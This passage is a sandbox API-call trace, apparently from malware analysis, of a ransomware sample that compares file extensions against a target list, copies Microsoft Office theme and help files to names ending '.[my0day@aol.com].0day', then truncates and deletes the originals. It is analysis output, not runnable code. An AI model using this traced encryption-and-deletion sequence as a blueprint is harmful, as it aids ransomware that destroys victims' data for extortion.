lstrlenW (lpString=".doc") returned 4 [0047.388] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.388] lstrlenW (lpString=".docx") returned 5 [0047.388] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.388] lstrlenW (lpString=".pdf") returned 4 [0047.388] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.388] lstrlenW (lpString=".xls") returned 4 [0047.389] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.389] lstrlenW (lpString=".xlsx") returned 5 [0047.389] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.389] lstrlenW (lpString=".ppt") returned 4 [0047.389] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.389] lstrlenW (lpString=".zip") returned 4 [0047.389] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.389] lstrlenW (lpString=".rar") returned 4 [0047.389] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.389] lstrlenW (lpString=".bz2") returned 4 [0047.389] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.389] lstrlenW (lpString=".7z") returned 3 [0047.389] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.389] lstrlenW (lpString=".dbf") returned 4 [0047.389] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.389] lstrlenW (lpString=".1cd") returned 4 [0047.389] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.389] lstrlenW (lpString=".jpg") returned 4 [0047.389] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.389] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.389] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.389] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.390] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2209) returned 1 [0047.390] CloseHandle (hObject=0x190) returned 1 [0047.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 0x20 [0047.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.390] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.390] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0047.416] GetLastError () returned 0x0 [0047.416] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x8a1, lpOverlapped=0x0) returned 1 [0047.450] WriteFile (in: hFile=0x174, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x8b0, lpOverlapped=0x0) returned 1 [0047.451] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.451] WriteFile (in: hFile=0x174, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.451] SetEndOfFile (hFile=0x174) returned 1 [0047.451] CloseHandle (hObject=0x174) returned 1 [0047.451] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.451] SetEndOfFile (hFile=0x190) returned 1 [0047.452] CloseHandle (hObject=0x190) returned 1 [0047.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.452] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 1 [0047.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.452] lstrlenW (lpString=".doc") returned 4 [0047.452] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.453] lstrlenW (lpString=".docx") returned 5 [0047.453] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.453] lstrlenW (lpString=".pdf") returned 4 [0047.453] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.453] lstrlenW (lpString=".xls") returned 4 [0047.453] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.453] lstrlenW (lpString=".xlsx") returned 5 [0047.453] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.453] lstrlenW (lpString=".ppt") returned 4 [0047.453] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.453] lstrlenW (lpString=".zip") returned 4 [0047.453] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.453] lstrlenW (lpString=".rar") returned 4 [0047.453] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.453] lstrlenW (lpString=".bz2") returned 4 [0047.453] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.453] lstrlenW (lpString=".7z") returned 3 [0047.453] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.453] lstrlenW (lpString=".dbf") returned 4 [0047.453] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.453] lstrlenW (lpString=".1cd") returned 4 [0047.453] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.453] lstrlenW (lpString=".jpg") returned 4 [0047.453] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.454] lstrlenW (lpString=".doc") returned 4 [0047.454] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.454] lstrlenW (lpString=".docx") returned 5 [0047.454] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.454] lstrlenW (lpString=".pdf") returned 4 [0047.454] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.454] lstrlenW (lpString=".xls") returned 4 [0047.454] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.454] lstrlenW (lpString=".xlsx") returned 5 [0047.454] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.454] lstrlenW (lpString=".ppt") returned 4 [0047.454] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.454] lstrlenW (lpString=".zip") returned 4 [0047.454] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.454] lstrlenW (lpString=".rar") returned 4 [0047.454] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.454] lstrlenW (lpString=".bz2") returned 4 [0047.454] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.454] lstrlenW (lpString=".7z") returned 3 [0047.454] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.454] lstrlenW (lpString=".dbf") returned 4 [0047.454] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.454] lstrlenW (lpString=".1cd") returned 4 [0047.454] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.455] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0047.455] lstrlenW (lpString=".jpg") returned 4 [0047.455] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.455] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.455] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.646] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=18380) returned 1 [0047.646] CloseHandle (hObject=0x214) returned 1 [0047.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 0x20 [0047.646] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.647] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.647] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0047.647] GetLastError () returned 0x0 [0047.647] ReadFile (in: hFile=0x214, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x47cc, lpOverlapped=0x0) returned 1 [0047.833] WriteFile (in: hFile=0x218, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x47d0, lpOverlapped=0x0) returned 1 [0047.834] ReadFile (in: hFile=0x214, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.834] WriteFile (in: hFile=0x218, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.834] SetEndOfFile (hFile=0x218) returned 1 [0047.834] CloseHandle (hObject=0x218) returned 1 [0047.834] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.834] SetEndOfFile (hFile=0x214) returned 1 [0047.835] CloseHandle (hObject=0x214) returned 1 [0047.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.836] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1 [0047.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.836] lstrlenW (lpString=".doc") returned 4 [0047.836] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.836] lstrlenW (lpString=".docx") returned 5 [0047.836] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.836] lstrlenW (lpString=".pdf") returned 4 [0047.836] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.836] lstrlenW (lpString=".xls") returned 4 [0047.836] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.836] lstrlenW (lpString=".xlsx") returned 5 [0047.836] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.836] lstrlenW (lpString=".ppt") returned 4 [0047.836] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.836] lstrlenW (lpString=".zip") returned 4 [0047.836] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.836] lstrlenW (lpString=".rar") returned 4 [0047.836] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.836] lstrlenW (lpString=".bz2") returned 4 [0047.836] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.836] lstrlenW (lpString=".7z") returned 3 [0047.836] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.836] lstrlenW (lpString=".dbf") returned 4 [0047.836] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.837] lstrlenW (lpString=".1cd") returned 4 [0047.837] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.837] lstrlenW (lpString=".jpg") returned 4 [0047.837] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.837] lstrlenW (lpString=".doc") returned 4 [0047.837] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.837] lstrlenW (lpString=".docx") returned 5 [0047.837] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.837] lstrlenW (lpString=".pdf") returned 4 [0047.837] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.837] lstrlenW (lpString=".xls") returned 4 [0047.837] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.837] lstrlenW (lpString=".xlsx") returned 5 [0047.837] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.837] lstrlenW (lpString=".ppt") returned 4 [0047.837] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.837] lstrlenW (lpString=".zip") returned 4 [0047.837] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.837] lstrlenW (lpString=".rar") returned 4 [0047.837] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.837] lstrlenW (lpString=".bz2") returned 4 [0047.837] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.837] lstrlenW (lpString=".7z") returned 3 [0047.837] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.837] lstrlenW (lpString=".dbf") returned 4 [0047.837] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.838] lstrlenW (lpString=".1cd") returned 4 [0047.838] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0047.838] lstrlenW (lpString=".jpg") returned 4 [0047.838] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.838] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0047.838] lstrlenW (lpString="VBHW6.CHM") returned 9 [0047.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.856] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=58026) returned 1 [0047.856] CloseHandle (hObject=0x210) returned 1 [0047.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 0x20 [0047.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.856] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.856] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.856] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.856] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.857] GetLastError () returned 0x0 [0047.857] ReadFile (in: hFile=0x210, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xe2aa, lpOverlapped=0x0) returned 1 [0047.859] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe2b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe2b0, lpOverlapped=0x0) returned 1 [0047.861] ReadFile (in: hFile=0x210, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.861] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0047.861] SetEndOfFile (hFile=0x1a8) returned 1 [0047.861] CloseHandle (hObject=0x1a8) returned 1 [0047.861] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.861] SetEndOfFile (hFile=0x210) returned 1 [0047.862] CloseHandle (hObject=0x210) returned 1 [0047.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.862] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 1 [0047.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.863] lstrlenW (lpString=".doc") returned 4 [0047.863] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString=".docx") returned 5 [0047.863] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0047.863] lstrlenW (lpString=".pdf") returned 4 [0047.863] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString=".xls") returned 4 [0047.863] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString=".xlsx") returned 5 [0047.863] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0047.863] lstrlenW (lpString=".ppt") returned 4 [0047.863] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.863] lstrlenW (lpString=".zip") returned 4 [0047.863] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString=".rar") returned 4 [0047.863] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString=".bz2") returned 4 [0047.863] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0047.863] lstrlenW (lpString=".7z") returned 3 [0047.863] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0047.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.863] lstrlenW (lpString=".dbf") returned 4 [0047.863] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.863] lstrlenW (lpString=".1cd") returned 4 [0047.863] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0047.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.863] lstrlenW (lpString=".jpg") returned 4 [0047.863] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0047.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.864] lstrlenW (lpString=".doc") returned 4 [0047.864] 